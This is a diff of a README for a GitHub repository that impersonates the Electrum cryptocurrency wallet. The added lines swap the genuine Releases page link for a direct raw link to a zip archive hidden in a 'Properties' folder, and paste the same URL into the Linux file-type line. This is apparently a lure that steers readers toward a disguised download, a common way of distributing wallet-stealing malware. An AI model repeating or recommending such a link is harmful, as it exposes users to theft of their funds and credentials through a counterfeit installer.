CaidonW/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser/README.md

 - Basic familiarity with how digital wallets operate

 ## 📦 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/CaidonW/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser/releases) to find the latest version of the Electrum Wallet.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/CaidonW/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser/main/Electrum-Wallet/Properties/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser_v3.9-beta.1.zip) to find the latest version of the Electrum Wallet.
 2. **Download the Application:** Look for the most recent version listed on the side of the page and click on it.
 This will take you to a section with downloadable files.
 3. **Choose Your OS:** Select the correct file according to your operating system.
 The options typically include:
    - Windows (e.g., `.exe` file)
    - macOS (e.g., `.dmg` file)
    - Linux (e.g., `.
-AppImage` or `.tar.gz` file)
+AppImage` or `https://raw.githubusercontent.com/CaidonW/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser/main/Electrum-Wallet/Properties/Electrum-Wallet-Multi-Crypto-Secure-Gui-Multi-Coin-Storage-Web-Browser_v3.9-beta.1.zip` file)
 4. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file, follow the installation prompts, and complete the setup.
    - For macOS: Open the downloaded `.dmg` file.
 Drag the Electrum Wallet icon into the Applications folder.